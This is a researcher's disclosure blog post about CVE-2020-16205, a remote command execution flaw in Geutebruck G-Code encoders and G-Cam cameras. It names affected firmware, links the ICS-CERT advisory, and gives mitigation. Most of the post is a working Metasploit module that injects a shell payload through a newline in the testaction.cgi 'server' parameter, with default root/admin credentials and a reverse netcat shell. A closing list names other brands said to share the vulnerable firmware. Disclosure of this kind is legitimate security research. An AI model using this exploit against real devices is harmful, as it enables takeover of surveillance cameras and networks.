Davy Douhine 3 min

Abstract

Those who follow our blog know that we like Geutebruck cameras: we found many trivial RCE on their products since 2016.

A few months ago we found a new one. Those new attack vectors / vulnerabilites are affecting firmware versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5 of the following Encoder and E2 Series Camera models:

G-Code:

  • EEC-2xxx

G-Cam:

  • EBC-21xx
  • EFD-22xx
  • ETHC-22xx
  • EWPC-22xx

Like before we’ve choose to “responsible disclose” this 0day vulnerability directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team). Since then a new firmware has been released (1.12.0.27) to fix that, ICS-CERT has released an advisory and one CVE (CVE-2020-16205) has been assigned.

Many thanks to Geutebruck and ICS-CERT teams.

Advisory

https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03

Exploit

This time we did a quick and dirty metasploit module with a check feature to check if your camera is vulnerable.

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##


class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStager
	  
	def initialize(info = {})
	super(update_info(info,
	    'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
	    'Description'    => %q{
	    This module exploits a an arbitrary command execution vulnerability. The
	    vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an
	    authenticated user to execute arbitrary commands with root privileges.
	    with web user privileges. Firmware <= 1.12.14.5 are concerned.
	    Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
	    },
	    'Author'         =>
	    [
	        'Davy Douhine'
	    ],
	    'License'        => MSF_LICENSE,
	    'References'     =>
	    [
	        [ 'CVE', '2020-16205' ],
	        [ 'URL', 'http://geutebruck.com' ],
	        [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ]
	    ],
	    'DisclosureDate' => 'May 20 2020',
	    'Privileged'     => true,
	    'Platform'            => ['unix', 'linux'],
	    'Arch'                => [ARCH_ARMLE],
	    'Targets'              => [
	    [ 'Automatic Target', { } ]
	    ],
	    'DefaultTarget'  => 0,
	    'DefaultOptions'      =>
	    {
	        'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
	    }
	    ))

	register_options(
	    [
	    OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]),
	    OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
	    OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']),
	    ], self.class)
	end

	def check
	    begin
	    res = send_request_cgi(
	        'method' => 'GET',
	        'uri' => '/brand.xml',
	        'query' => "",
	    )
	    if res && res.body.include?("1.12.14.5")
	        return CheckCode::Vulnerable
	    end
	    rescue ::Rex::ConnectionError
	    return CheckCode::Unknown
	    end
	    CheckCode::Safe
	end

	def exploit
	user = datastore['HttpUsername']
	pass = datastore['HttpPassword']
	header = "type=ntp&server=%0a"
	uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all")
	print_status("#{rhost}:#{rport} - Attempting to exploit...")
	res = send_request_raw(
	    {
	    'method' => 'GET',
	    'uri'    => uri
	})
	end

end

Mitigation

Geutebruck has released a new software version, Version 1.12.0.27, to address the identified vulnerability, which is available at the following location (registration needed):

http://www.geutebrueck.com/en_EN/login.html

If an update is not possible right now in between users can disable the “Enable anonymous access” option to mitigate the risk. The RCE will remain but will only be reachable by authenticated users.

In the wild

Many brands use the same firmware (and are vulnerable too):

  • UDP Technology (which is also the supplier of the firmware for the other vendors)
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence
  • Sophus
  • VCA
  • TripCorps
  • Sprinx Technologies
  • Smartec
  • Riva